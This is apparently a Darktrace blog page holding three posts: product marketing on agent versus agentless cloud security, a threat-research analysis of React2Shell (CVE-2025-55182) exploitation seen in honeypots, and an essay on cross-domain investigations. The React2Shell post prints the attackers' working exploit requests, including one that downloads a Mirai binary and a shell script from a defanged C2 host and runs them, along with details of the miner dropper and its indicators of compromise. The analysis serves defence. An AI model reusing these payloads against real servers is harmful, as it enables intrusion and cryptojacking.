Blog
/
/
January 13, 2025

Agent vs. Agentless Cloud Security: Why Deployment Methods Matter

Cloud security solutions can be deployed with agentless or agent-based approaches or use a combination of methods. Organizations must weigh which method applies best to the assets and data the tool will protect.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Kellie Regan
Director, Product Marketing - Cloud Security
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
13
Jan 2025

The rapid adoption of cloud technologies has brought significant security challenges for organizations of all sizes. According to recent studies, over 70% of enterprises now operate in hybrid or multi-cloud environments, with 93% employing a multi-cloud strategy[1]. This complexity requires robust security tools, but opinions vary on the best deployment method—agent-based, agentless, or a combination of both.

Agent-based and agentless cloud security approaches offer distinct benefits and limitations, and organizations often make deployment choices based on their unique needs depending on the function of the specific assets covered, the types of data stored, and cloud architecture, such as hybrid or multi-cloud deployments.

For example, agentless solutions are increasingly favored for their ease of deployment and ability to provide broad visibility across dynamic cloud environments. These are especially useful for DevOps teams, with 64% of organizations citing faster deployment as a key reason for adopting agentless tools[2].

On the other hand, agent-based solutions remain the preferred choice for environments requiring deep monitoring and granular control, such as securing sensitive high-value workloads in industries like finance and healthcare. In fact, over 50% of enterprises with critical infrastructure report relying on agent-based solutions for their advanced protection capabilities[3].

As the debate continues, many organizations are turning to combined approaches, leveraging the strengths of both agent-based and agentless tools to address the full spectrum of their security needs for comprehensive coverage. Understanding the capabilities and limitations of these methods is critical to building an effective cloud security strategy that adapts to evolving threats and complex infrastructures.

Agent-based cloud security

Agent-based security solutions involve deploying software agents on each device or system that needs protection. Agent-based solutions are great choices when you need in-depth monitoring and protection capabilities. They are ideal for organizations that require deep security controls and real-time active response, particularly in hybrid and on-premises environments.

Key advantages include:

1. Real-time monitoring and protection: Agents detect and block threats like malware, ransomware, and anomalous behaviors in real time, providing ongoing protection and enforcing compliance by continuously monitoring workload activities.  Agents enable full control over workloads for active response such as blocking IP addresses, killing processes, disabling accounts, and isolating infected systems from the network, stopping lateral movement.

2. Deep visibility for hybrid environments: Agent-based approaches allow for full visibility across on-premises, hybrid, and multi-cloud environments by deploying agents on physical and virtual machines. Agents offer detailed insights into system behavior, including processes, files, memory, network connections, and more, detecting subtle anomalies that might indicate security threats. Host-based monitoring tracks vulnerabilities at the system and application level, including unpatched software, rogue processes, and unauthorized network activity.

3. Comprehensive coverage: Agents are very effective in hybrid environments (cloud and on-premises), as they can be installed on both physical and virtual machines.  Agents can function independently on each host device onto which they are installed, which is especially helpful for endpoints that may operate outside of constant network connectivity.

Challenges:

1. Resource-intensive: Agents can consume CPU, memory, and network resources, which may affect performance, especially in environments with large numbers of workloads or ephemeral resources.

2. Challenging in dynamic environments: Managing hundreds or thousands of agents in highly dynamic or ephemeral environments (e.g., containers, serverless functions) can be complex and labor-intensive.

3. Slower deployment: Requires agent installation on each workload or instance, which can be time-consuming, particularly in large or complex environments.  

Agentless cloud security

Agentless security does not require software agents to be installed on each device. Instead, it uses cloud infrastructure and APIs to perform security checks. Agentless solutions are highly scalable with minimal impact on performance, and ideal for cloud-native and highly dynamic environments like serverless and containerized. These solutions are great choices for your cloud-native and multi-cloud environments where rapid deployment, scalability, and minimal impact on performance are critical, but response actions can be handled through external tools or manual processes.

Key advantages include:

1. Scalability and ease of deployment: Because agentless security doesn’t require installation on each individual device, it is much easier to deploy and can quickly scale across a vast number of cloud assets. This approach is ideal for environments where resources are frequently created and destroyed (e.g., serverless, containerized workloads), as there is no need for agent installation or maintenance.

2. Reduced system overhead: Without the need to run local agents, agentless security minimizes the impact on system performance. This is crucial in high-performance environments.

3. Broad visibility: Agentless security connects via API to cloud service providers, offering near-instant visibility and threat detection. It provides a comprehensive view of your cloud environment, making it easier to manage and secure large and complex infrastructures.

Challenges

1. Infrastructure-level monitoring: Agentless solutions rely on cloud service provider logs and API calls, meaning that detection might not be as immediate as agent-based solutions. They collect configuration data and logs, focusing on infrastructure misconfigurations, identity risks, exposed resources, and network traffic, but lack visibility and access to detailed, system-level information such as running processes and host-level vulnerabilities.

2. Cloud-focused: Primarily for cloud environments, although some tools may integrate with on-premises systems through API-based data gathering. For organizations with hybrid cloud environments, this approach fragments visibility and security, leading to blind spots and increasing security risk.

3. Passive remediation: Typically provides alerts and recommendations, but lacks deep control over workloads, requiring manual intervention or orchestration tools (e.g., SOAR platforms) to execute responses. Some agentless tools trigger automated responses via cloud provider APIs (e.g., revoking permissions, adjusting security groups), but with limited scope.

Combined agent-based and agentless approaches

A combined approach leverages the strengths of both agent-based and agentless security for complete coverage. This hybrid strategy helps security teams achieve comprehensive coverage by:

  • Using agent-based solutions for deep, real-time protection and detailed monitoring of critical systems or sensitive workloads.
  • Employing agentless solutions for fast deployment, broader visibility, and easier scalability across all cloud assets, which is particularly useful in dynamic cloud environments where workloads frequently change.

The combined approach has distinct practical applications. For example, imagine a financial services company that deals with sensitive transactions. Its security team might use agent-based security for critical databases to ensure stringent protections are in place. Meanwhile, agentless solutions could be ideal for less critical, transient workloads in the cloud, where rapid scalability and minimal performance impact are priorities. With different data types and infrastructures, the combined approach is best.

Best of both worlds: The benefits of a combined approach

The combined approach not only maximizes security efficacy but also aligns with diverse operational needs. This means that all parts of the cloud environment are secured according to their risk profile and functional requirements. Agent-based deployment provides in-depth monitoring and active protection against threats, suitable for environments requiring tight security controls, such as financial services or healthcare data processing systems. Agentless deployment complements agents by offering broader visibility and easier scalability across diverse and dynamic cloud environments, ideal for rapidly changing cloud resources.

There are three major benefits from combining agent-based and agentless approaches.

1. Building a holistic security posture: By integrating both agent-based and agentless technologies, organizations can ensure that all parts of their cloud environments are covered—from persistent, high-risk endpoints to transient cloud resources. This comprehensive coverage is crucial for detecting and responding to threats promptly and effectively.

2. Reducing overhead while boosting scalability: Agentless systems require no software installation on each device, reducing overhead and eliminating the need to update and maintain agents on a large number of endpoints. This makes it easier to scale security as the organization grows or as the cloud environment changes.

3. Applying targeted protection where needed: Agent-based solutions can be deployed on selected assets that handle sensitive information or are critical to business operations, thus providing focused protection without incurring the costs and complexity of universal deployment.

Use cases for a combined approach

A combined approach gives security teams the flexibility to deploy agent-based and agentless solutions based on the specific security requirements of different assets and environments. As a result, organizations can optimize their security expenditures and operational efforts, allowing for greater adaptability in cloud security use cases.

Let’s take a look at how this could practically play out. In the combined approach, agent-based security can perform the following:

1. Deep monitoring and real-time protection:

  • Workload threat detection: Agent-based solutions monitor individual workloads for suspicious activity, such as unauthorized file changes or unusual resource usage, providing high granularity for detecting threats within critical cloud applications.
  • Behavioral analysis of applications: By deploying agents on virtual machines or containers, organizations can monitor behavior patterns and flag anomalies indicative of insider threats, lateral movement, or Advanced Persistent Threats (APTs).
  • Protecting high-sensitivity environments: Agents provide continuous monitoring and advanced threat protection for environments processing sensitive data, such as payment processing systems or healthcare records, leveraging capabilities like memory protection and file integrity monitoring.

2. Cloud asset protection:

  • Securing critical infrastructure: Agent-based deployments are ideal for assets like databases or storage systems that require real-time defense against exploits and ransomware.
  • Advanced packet inspection: For high-value assets, agents offer deep packet inspection and in-depth logging to detect stealthy attacks such as data exfiltration.
  • Customizable threat response: Agents allow for tailored security rules and automated responses at the workload level, such as shutting down compromised instances or quarantining infected files.

At the same time, agentless cloud security provides complementary benefits such as:

1. Broad visibility and compliance:

  • Asset discovery and management: Agentless systems can quickly scan the entire cloud environment to identify and inventory all assets, a crucial capability for maintaining compliance with regulations like GDPR or HIPAA, which require up-to-date records of data locations and usage.
  • Regulatory compliance auditing and configuration management: Quickly identify gaps in compliance frameworks like PCI DSS or SOC 2 by scanning configurations, permissions, and audit trails without installing agents. Using APIs to check configurations across cloud services ensures that all instances comply with organizational and regulatory standards, an essential aspect for maintaining security hygiene and compliance.
  • Shadow IT Detection: Detect and map unauthorized cloud services or assets that are spun up without security oversight, ensuring full inventory coverage.

2. Rapid environmental assessment:

  • Vulnerability assessment of new deployments: In environments where new code is frequently deployed, agentless security can quickly assess new instances, containers, or workloads in CI/CD pipelines for vulnerabilities and misconfigurations, enabling secure deployments at DevOps speed.
  • Misconfiguration alerts: Detect and alert on common cloud configuration issues, such as exposed storage buckets or overly permissive IAM roles, across cloud providers like AWS, Azure, and GCP.
  • Policy enforcement: Validate that new resources adhere to established security baselines and organizational policies, preventing security drift during rapid cloud scaling.

Combining agent-based and agentless approaches in cloud security not only maximizes the protective capabilities, but also offers flexibility, efficiency, and comprehensive coverage tailored to the diverse and evolving needs of modern cloud environments. This integrated strategy ensures that organizations can protect their assets more effectively while also adapting quickly to new threats and regulatory requirements.

Darktrace offers complementary and flexible deployment options for holistic cloud security

Powered by multilayered AI, Darktrace / CLOUD is a Cloud Detection and Response (CDR) solution that is agentless by default, with optional lightweight, host-based server agents for enhanced real-time actioning and deep inspection. As such, it can deploy in cloud environments in minutes and provide unified visibility and security across hybrid, multi-cloud environments.

With any deployment method, Darktrace supports multi-tenant, hybrid, and serverless cloud environments. Its Self-Learning AI learns the normal behavior across architectures, assets, and users to identify unusual activity that may indicate a threat. With this approach, Darktrace / CLOUD quickly disarms threats, whether they are known, unknown, or completely novel. It then accelerates the investigation process and responds to threats at machine speed.

Learn more about how Darktrace / CLOUD secures multi and hybrid cloud environments in the Solution Brief.

References:

1. Flexera 2023 State of the Cloud Report

2. ESG Research 2023 Report on Cloud-Native Security

3. Gartner, Market Guide for Cloud Workload Protection Platforms, 2023

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Kellie Regan
Director, Product Marketing - Cloud Security

More in this series

No items found.

Blog

/

Network

/

December 11, 2025

React2Shell: How Opportunist Attackers Exploited CVE-2025-55182 Within Hours

React2Shell: How Opportunist Attackers Exploited CVE-2025-55182 Within HoursDefault blog imageDefault blog image

What is React2Shell?

CVE-2025-55182, also known as React2Shell is a vulnerability within React server components that allows for an unauthenticated attacker to gain remote code execution with a single request. The severity of this vulnerability and ease of exploitability has led to threat actors opportunistically exploiting it within a matter of days of its public disclosure.

Darktrace security researchers rapidly deployed a new honeypot using the Cloudypots system, allowing for the monitoring of exploitation of the vulnerability in the wild.

Cloudypots is a system that enables virtual instances of vulnerable applications to be deployed in the cloud and monitored for attack. This approach allows for Darktrace to deploy high-interaction, realistic honeypots, that appear as genuine deployments of vulnerable software to attackers.

This blog will explore one such campaign, nicknamed “Nuts & Bolts” based on the naming used in payloads.

Analysis of the React2Shell exploit

The React2Shell exploit relies on an insecure deserialization vulnerability within React Server Components’ “Flight” protocol. This protocol uses a custom serialization scheme that security researchers discovered could be abused to run arbitrary JavaScript by crafting the serialized data in a specific way. This is possible because the framework did not perform proper type checking, allowing an attacker to reference types that can be abused to craft a chain that resolves to an anonymous function, and then invoke it with the desired JavaScript as a promise chain.

This code execution can then be used to load the ‘child_process’ node module and execute any command on the target server.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day [1]. Within 30 hours of the patch, a publicly available proof of concept emerged that could be used to exploit any vulnerable server. This rapid timeline left many servers remaining unpatched by the time attackers began actively exploiting the vulnerability.

Initial access

The threat actor behind the “Nuts & Bolts” campaign uses a spreader server with IP 95.214.52[.]170 to infect victims. The IP appears to be located in Poland and is associated with a hosting provided known as MEVSPACE. The spreader is highly aggressive, launching exploitation attempts, roughly every hour.

When scanning, he spreader primarily targets port 3000, which is the default port for a NEXT.js server in a default or development configuration. It is possible the attacker is avoiding port 80 and 443, as these are more likely to have reverse proxies or WAFs in front of the server, which could disrupt exploitation attempts.

When the spreader finds a new host with port 3000 open, it begins by testing if it is vulnerable to React2Shell by sending a crafted request to run the ‘whoami’ command and store the output in an error digest that is returned to the attacker.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(whoami)',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

The above snippet is the core part of the crafted request that performs the execution. This allows the attacker to confirm that the server is vulnerable and fetch the user account under which the NEXT.js process is running, which is useful information for determining if a target is worth attacking.

From here, the attacker then sends an additional request to run the actual payload on the victim server.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(cd /dev;(busybox wget -O x86 hxxp://89[.]144.31.18/nuts/x86%7C%7Ccurl -s -o x86 hxxp://89[.]144.31.18/nuts/x86 );chmod 777 x86;./x86 reactOnMynuts;(busybox wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||curl -s hxxp://89[.]144.31.18/nuts/bolts)%7Csh)&',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

This snippet attempts to deploy several payloads by using wget (or curl if wget fails) into the /dev directory and execute them. The x86 binary is a Mirai variant that does not appear to have any major alterations to regular Mirai. The ‘nuts/bolts’ endpoint returns a bash script, which is then executed. The script includes several log statements throughout its execution to provide visibility into which parts ran successfully. Similar to the ‘whoami’ request, the output is placed in an error digest for the attacker to review.

In this case, the command-and-control (C2) IP, 89[.]144.31.18, is hosted on a different server operated by a German hosting provider named myPrepaidServer, which offers virtual private server (VPS) services and accepts cryptocurrency payments [2].  

Logs observed in the NEXT.JS console as a result of exploitation. In this case, the honeypot was attacked just two minutes after being deployed.
Figure 1: Logs observed in the NEXT.JS console as a result of exploitation. In this case, the honeypot was attacked just two minutes after being deployed.

Nuts & Bolts script

This script’s primary purpose is to prepare the box for a cryptocurrency miner.

The script starts by attempting to terminate any competing cryptocurrency miner processes using ‘pkill’ that match on a specific name. It will check for and terminate:

  • xmrig
  • softirq (this also matches a system process, which it will fail to kill each invocation)
  • watcher
  • /tmp/a.sh
  • health.sh

Following this, the script will checks for a process named “fghgf”. If it is not running, it will retrieve hxxp://89[.]144.31.18/nuts/lc and write it to /dev/ijnegrrinje.json, as well as retrieving hxxp://89[.]144.31.18/nuts/x and writing it to /dev/fghgf. The script will the executes /dev/fghgf -c /dev/ijnegrrinje.json -B in the background, which is an XMRig miner.

The XMRig deployment script.
Figure 2: The XMRig deployment script.

The miner is configured to connect to two private pools at 37[.]114.37.94 and 37[.]114.37.82, using  “poop” as both the username and password. The use of a private pool conceals the associated wallet address. From here, a short bash script is dropped to /dev/stink.sh. This script continuously crawls all running processes on the system and reads their /proc/pid/exe path, which contains a copy of the original executable that was run. The ‘strings’ utility is run to output all valid ASCII strings found within the data and checks to see if contains either “xmrig”, “rondo” or “UPX 5”. If so, it sends a SIGKILL to the process to terminate it.

Additionally, it will run ‘ls –l’ on the exe path in case it is symlinked to a specific path or has been deleted. If the output contains any of the following strings, the script sends a SIGKILL to terminate the program:

  • (deleted) - Indicates that the original executable was deleted from the disk, a common tactic used by malware to evade detection.
  • xmrig
  • hash
  • watcher
  • /dev/a
  • softirq
  • rondo
  • UPX 5.02
 The killer loop and the dropper. In this case ${R}/${K} resolves to /dev/stink.sh.
Figure 3: The killer loop and the dropper. In this case ${R}/${K} resolves to /dev/stink.sh.

Darktrace observations in customer environments  

Following the public disclosure of CVE‑2025‑55182 on December, Darktrace observed multiple exploitation attempts across customer environments beginning around December 4. Darktrace triage identified a series of consistent indicators of compromise (IoCs). By consolidating indicators across multiple deployments and repeat infrastructure clusters, Darktrace identified a consistent kill chain involving shell‑script downloads and HTTP beaconing.

In one example, on December 5, Darktrace observed external connections to malicious IoC endpoints (172.245.5[.]61:38085, 5.255.121[.]141, 193.34.213[.]15), followed by additional connections to other potentially malicious endpoint. These appeared related to the IoCs detailed above, as one suspicious IP address shared the same ASN. After this suspicious external connectivity, Darktrace observed cryptomining-related activity. A few hours later, the device initiated potential lateral movement activity, attempting SMB and RDP sessions with other internal devices on the network. These chain of events appear to identify this activity to be related to the malicious campaign of the exploitation of React2Shell vulnerability.

Generally, outbound HTTP traffic was observed to ports in the range of 3000–3011, most notably port 3001. Requests frequently originated from scripted tools, with user agents such as curl/7.76.1, curl/8.5.0, Wget/1.21.4, and other generic HTTP signatures. The URIs associated with these requests included paths like /nuts/x86 and /n2/x86, as well as long, randomized shell script names such as /gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh. In some cases, parameterized loaders were observed, using query strings like: /?h=<ip>&p=<port>&t=<proto>&a=l64&stage=true.  

Infrastructure analysis revealed repeated callbacks to IP-only hosts linked to ASN AS200593 (Prospero OOO), a well-known “bulletproof” hosting provider often utilized by cyber criminals [3], including addresses such as 193.24.123[.]68:3001 and 91.215.85[.]42:3000, alongside other nodes hosting payloads and staging content.

Darktrace model coverage

Darktrace model coverage consistently highlighted behaviors indicative of exploitation. Among the most frequent detections were anomalous server activity on new, non-standard ports and HTTP requests posted to IP addresses without hostnames, often using uncommon application protocols. Models also flagged the appearance of new user agents such as curl and wget originating from internet-facing systems, representing an unusual deviation from baseline behavior.  

Additionally, observed activity included the download of scripts and executable files from rare external sources, with Darktrace’s Autonomous Response capability intervening to block suspicious transfers, when enabled. Beaconing patterns were another strong signal, with detections for HTTP beaconing to new or rare IP addresses, sustained SSL or HTTP increases, and long-running compromise indicators such as “Beacon for 4 Days” and “Slow Beaconing.”

Conclusion

While this opportunistic campaign to exploit the React2Shell exploit is not particularly sophisticated, it demonstrates that attackers can rapidly prototyping new methods to take advantage of novel vulnerabilities before widespread patching occurs. With a time to infection of only two minutes from the initial deployment of the honeypot, this serves as a clear reminder that patching vulnerabilities as soon as they are released is paramount.

Credit to Nathaniel Bill (Malware Research Engineer), George Kim (Analyst Consulting Lead – AMS), Calum Hall (Technical Content Researcher), Tara Gould (Malware Research Lead, and Signe Zaharka (Principal Cyber Analyst).

Edited by Ryan Traill (Analyst Content Lead)

Appendices

IoCs

Spreader IP - 95[.]214.52.170

C2 IP - 89[.]144.31.18

Mirai hash - 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb

Xmrig hash - aa6e0f4939135feed4c771e4e4e9c22b6cedceb437628c70a85aeb6f1fe728fa

Config hash - 318320a09de5778af0bf3e4853d270fd2d390e176822dec51e0545e038232666

Monero pool 1 - 37[.]114.37.94

Monero pool 2 - 37[.]114.37.82

References  

[1] https://nvd.nist.gov/vuln/detail/CVE-2025-55182

[2] https://myprepaid-server.com/

[3] https://krebsonsecurity.com/2025/02/notorious-malware-spam-host-prospero-moves-to-kaspersky-lab

Darktrace Model Coverage

Anomalous Connection::Application Protocol on Uncommon Port

Anomalous Connection::New User Agent to IP Without Hostname

Anomalous Connection::Posting HTTP to IP Without Hostname

Anomalous File::Script and EXE from Rare External

Anomalous File::Script from Rare External Location

Anomalous Server Activity::New User Agent from Internet Facing System

Anomalous Server Activity::Rare External from Server

Antigena::Network::External Threat::Antigena Suspicious File Block

Antigena::Network::External Threat::Antigena Watched Domain Block

Compromise::Beacon for 4 Days

Compromise::Beacon to Young Endpoint

Compromise::Beaconing Activity To External Rare

Compromise::High Volume of Connections with Beacon Score

Compromise::HTTP Beaconing to New IP

Compromise::HTTP Beaconing to Rare Destination

Compromise::Large Number of Suspicious Failed Connections

Compromise::Slow Beaconing Activity To External Rare

Compromise::Sustained SSL or HTTP Increase

Device::New User Agent

Device::Threat Indicator

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer

Blog

/

/

December 8, 2025

Simplifying Cross Domain Investigations

simplifying cross domain thraetsDefault blog imageDefault blog image

Cross-domain gaps mean cross-domain attacks  

Organizations are built on increasingly complex digital estates. Nowadays, the average IT ecosystem spans across a large web of interconnected domains like identity, network, cloud, and email.  

While these domain-specific technologies may boost business efficiency and scalability, they also provide blind spots where attackers can shelter undetected. Threat actors can slip past defenses because security teams often use different detection tools in each realm of their digital infrastructure. Adversaries will purposefully execute different stages of an attack across different domains, ensuring no single tool picks up too many traces of their malicious activity. Identifying and investigating this type of threat, known as a cross-domain attack, requires mastery in event correlation.  

For example, one isolated network scan detected on your network may seem harmless at first glance. Only when it is stitched together with a rare O365 login, a new email rule and anomalous remote connections to an S3 bucket in AWS does it begin to manifest as an actual intrusion.  

However, there are a whole host of other challenges that arise with detecting this type of attack. Accessing those alerts in the respective on-premise network, SaaS and IaaS environments, understanding them and identifying which ones are related to each other takes significant experience, skill and time. And time favours no one but the threat actor.  

Anatomy of a cross domain attack
Figure 1: Anatomy of a cross domain attack

Diverse domains and empty grocery shelves

In April 2025, the UK faced a throwback to pandemic-era shortages when the supermarket giant Marks & Spencer (M&S) was crippled by a cyberattack, leaving empty shelves across its stores and massive disruptions to its online service.  

The threat actors, a group called Scattered Spider, exploited multiple layers of the organization’s digital infrastructure. Notably, the group were able to bypass the perimeter not by exploiting a technical vulnerability, but an identity. They used social engineering tactics to impersonate an M&S employee and successfully request a password reset.  

Once authenticated on the network, they accessed the Windows domain controller and exfiltrated the NTDS.dit file – a critical file containing hashed passwords for all users in the domain. After cracking those hashes offline, they returned to the network with escalated privileges and set their sights on the M&S cloud infrastructure. They then launched the encryption payload on the company’s ESXi virtual machines.

To wrap up, the threat actors used a compromised employee’s email account to send an “abuse-filled” email to the M&S CEO, bragging about the hack and demanding payment. This was possibly more of a psychological attack on the CEO than a technically integral part of the cyber kill chain. However, it revealed yet another one of M&S’s domains had been compromised.  

In summary, the group’s attack spanned four different domains:

Identity: Social engineering user impersonation

Network: Exfiltration of NTDS.dit file

Cloud: Ransomware deployed on ESXI VMs

Email: Compromise of user account to contact the CEO

Adept at exploiting nuance

This year alone, several high-profile cyber-attacks have been attributed to the same group, Scattered Spider, including the hacks on Victoria’s Secret, Adidas, Hawaiian Airlines, WestJet, the Co-op and Harrods. It begs the question, what has made this group so successful?

In the M&S attack, they showcased their advanced proficiency in social engineering, which they use to bypass identity controls and gain initial access. They demonstrated deep knowledge of cloud environments by deploying ransomware onto virtualised infrastructure. However, this does not exemplify a cookie-cutter template of attack methods that brings them success every time.

According to CISA, Scattered Spider typically use a remarkable variety of TTPs (tactics, techniques and procedures) across multiple domains to carry out their campaigns. From leveraging legitimate remote access tools in the network, to manipulating AWS EC2 cloud instances or spoofing email domains, the list of TTPs used by the group is eye-wateringly long. Additionally, the group reportedly evades detection by “frequently modifying their TTPs”.  

If only they had better intentions. Any security director would be proud of a red team who not only has this depth and breadth of domain-centric knowledge but is also consistently upskilling.  

Yet, staying ahead of adversaries who seamlessly move across domains and fluently exploit every system they encounter is just one of many hurdles security teams face when investigating cross-domain attacks.  

Resource-heavy investigations

There was a significant delay in time to detection of the M&S intrusion. News outlet BleepingComputer reported that attackers infiltrated the M&S network as early as February 2025. They maintained persistence for weeks before launching the attack in late April 2025, indicating that early signs of compromise were missed or not correlated across domains.

While it’s unclear exactly why M&S missed the initial intrusion, one can speculate about the unique challenges investigating cross-domain attacks present.  

Challenges of cross-domain investigation

First and foremost, correlation work is arduous because the string of malicious behaviour doesn’t always stem from the same device.  

A hypothetical attack could begin with an O365 credential creating a new email rule. Weeks later, that same credential authenticates anomalously on two different devices. One device downloads an .exe file from a strange website, while the other starts beaconing every minute to a rare external IP address that no one else in the organisation has ever connected to. A month later, a third device downloads 1.3 GiB of data from a recently spun up S3 bucket and gradually transfers a similar amount of data to that same rare IP.

Amid a sea of alerts and false positives, connecting the dots of a malicious attack like this takes time and meticulous correlation. Factor in the nuanced telemetry data related to each domain and things get even more complex.  

An analyst who specialises in network security may not understand the unique logging formats or API calls in the cloud environment. Perhaps they are proficient in protecting the Windows Active Directory but are unfamiliar with cloud IAM.  

Cloud is also an inherently more difficult domain to investigate. With 89% of organizations now operating in multi-cloud environments time must be spent collecting logs, snapshots and access records. Coupled with the threat of an ephemeral asset disappearing, the risk of missing a threat is high. These are some of the reasons why research shows that 65% of organisations spend 3-5 extra days investigating cloud incidents.  

Helpdesk teams handling user requests over the phone require a different set of skills altogether. Imagine a threat actor posing as an employee and articulately requesting an urgent password reset or a temporary MFA deactivation. The junior Helpdesk agent— unfamiliar with the exception criteria, eager to help and feeling pressure from the persuasive manipulator at the end of the phoneline—could easily fall victim to this type of social engineering.  

Empowering analysts through intelligent automation

Even the most skilled analysts can’t manually piece together every strand of malicious activity stretching across domains. But skill alone isn’t enough. The biggest hurdle in investigating these attacks often comes down to whether the team have the time, context, and connected visibility needed to see the full picture.

Many organizations attempt to bridge the gap by stitching together a patchwork of security tools. One platform for email, another for endpoint, another for cloud, and so on. But this fragmentation reinforces the very silos that cross-domain attacks exploit. Logs must be exported, normalized, and parsed across tools a process that is not only error-prone but slow. By the time indicators are correlated, the intrusion has often already deepened.

That’s why automation and AI are becoming indispensable. The future of cross-domain investigation lies in systems that can:

  • Automatically correlate activity across domains and data sources, turning disjointed alerts into a single, interpretable incident.
  • Generate and test hypotheses autonomously, identifying likely chains of malicious behaviour without waiting for human triage.
  • Explain findings in human terms, reducing the knowledge gap between junior and senior analysts.
  • Operate within and across hybrid environments, from on-premise networks to SaaS, IaaS, and identity systems.

This is where Darktrace transforms alerting and investigations. Darktrace’s Cyber AI Analyst automates the process of correlation, hypothesis testing, and narrative building, not just within one domain, but across many. An anomalous O365 login, a new S3 bucket, and a suspicious beaconing host are stitched together automatically, surfacing the story behind the alerts rather than leaving it buried in telemetry.

How threat activity is correlated in Cyber AI Analyst
Figure 2: How threat activity is correlated in Cyber AI Analyst

By analyzing events from disparate tools and sources, AI Analyst constructs a unified timeline of activity showing what happened, how it spread, and where to focus next. For analysts, it means investigation time is measured in minutes, not days. For security leaders, it means every member of the SOC, regardless of experience, can contribute meaningfully to a cross-domain response.

Figure 3: Correlation showcasing cross domains (SaaS and IaaS) in Cyber AI Analyst

Until now, forensic investigations were slow, manual, and reserved for only the largest organizations with specialized DFIR expertise. Darktrace / Forensic Acquisition & Investigation changes that by leveraging the scale and elasticity of the cloud itself to automate the entire investigation process. From capturing full disk and memory at detection to reconstructing attacker timelines in minutes, the solution turns fragmented workflows into streamlined investigations available to every team.

What once took days now takes minutes. Now, forensic investigations in the cloud are faster, more scalable, and finally accessible to every security team, no matter their size or expertise.

Continue reading
About the author
Benjamin Druttman
Cyber Security AI Technical Instructor
Your data. Our AI.
Elevate your network security with Darktrace AI